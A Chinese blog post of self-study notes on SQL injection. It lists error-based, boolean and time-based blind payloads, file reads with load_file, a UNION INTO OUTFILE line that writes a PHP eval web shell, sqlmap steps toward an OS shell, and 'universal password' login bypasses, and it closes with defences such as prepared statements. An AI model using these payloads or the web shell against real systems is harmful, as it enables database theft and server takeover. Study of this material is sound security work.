自学sql注入(三)

2020-07-14 15:37:02 浏览数 (1)

这是笔者自行整理出来的有关sql注入的一些知识点,自己还有些迷迷糊糊,可能有些不对的地方。等学完之后,再来详写一系列的关于sql注入的文章

自学sql注入(一)

自学sql注入(二)

基于floor的报错注入:

代码语言:javascript复制
1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

基于boolean的盲注

Boolean是基于真假的判断(true or false);

不管输入什么,结果都只返回真或假两种情况;

Boolean型盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果判断正确与否

Boolean型盲注的判断方式有

通过长度判断length():

代码语言:javascript复制
select length(database())>=x

通过字符判断substr():

代码语言:javascript复制
select substr(database(),1,1) =‘s’

通过ascII码判断:ascii():

代码语言:javascript复制
select ascii(substr(database(),1,1)) =x

基于时间的盲注:

页面不返回任何信息

通过时间回显的延迟作为判断。

利用sleep()或benchmark()函数延长mysql的执行时间;

与if()搭配使用

时间型盲注

代码语言:javascript复制
payload:if(expr1,expr2,expr3)

语义解析:

对expr1进行布尔判断,如果为真,则执行expr2,如果为假,则执行expr3

常用payload:

if(length(database())>1,sleep(5),1)

如果数据库名字符长度大于1为真,则mysql休眠5秒,否则查询1

盲注常用函数

left(m,n) --从左向右截取字符串m返回其前n位

substr(m,1,1) --取字符串m的左边第一位起,1字长的字符串

ascii(m) --返回字符m的ASCII码

if(str1,str2,str3)–如果str1正确就执行str2,否则执行str3

sleep(m)–使程序暂停m秒

length(m) --返回字符串m的长度

count(column_name) --返回指定列的值的数目

sql注入文件读写

利用sql进行读写需要一个非常重要的前置条件:secure_file_priv

在数据库中输入show global variables like ‘%secure%’命令查看secure_file_priv的值。

secure_file_priv=null,不能进行写入导出;

secure_file_priv=空(什么都没有),可以进行写入导出;

secure_file_priv=/tmp/,写入导出只能在/tmp/进行。

该配置可以在my.cnf中进行修改。

读取:Select load_file(‘c:/wamp/www/flag.txt’);读取文件,必须知道绝对路径

写入:1’ union select 1,2,“?php@eval($_GET[‘test’]);?” into outfile‘c:/wamp/www/test1.php’ #

使用sqlmap控制服务器的方法:

1、正常找到注入点;

2、输入–current-user,获得当前用户信息;

3、输入–is-dba,查看是否为数据库管理员,返回TRUE时代表是管理员

4、输入–os-shell,尝试获得系统权限,选择正确的服务器语言以及上传路径

万能密码

本质上是基于sql注入的永真条件来实现万能密码登录

1 or 1=1

1’ or 1=1#

post的注入

常见于登录面板

使用burpsuite抓包到repeater进行手工注入

将注入请求的数据包保存到一个txt文档例如sql.txt,然后在sqlmap中使用sqlmap.py -r "sql.txt"来进行注入

sql注入的防护

1、对输入严格过滤和转义

使用addslashes,mysqli_real_escape_string对字符进行过滤或转义,本质基于黑名单,存在绕过可能性;

2、预编译和参数化(推荐)

使用pdo的prepare对输入进行预处理;

3、部署waf(硬件waf,安全狗)

存在绕过可能性

4、云端防护(360网站卫士,阿里云盾)

通过dns将用户输入先解析到云防护上,确认安全再请求目标服务器

0 人点赞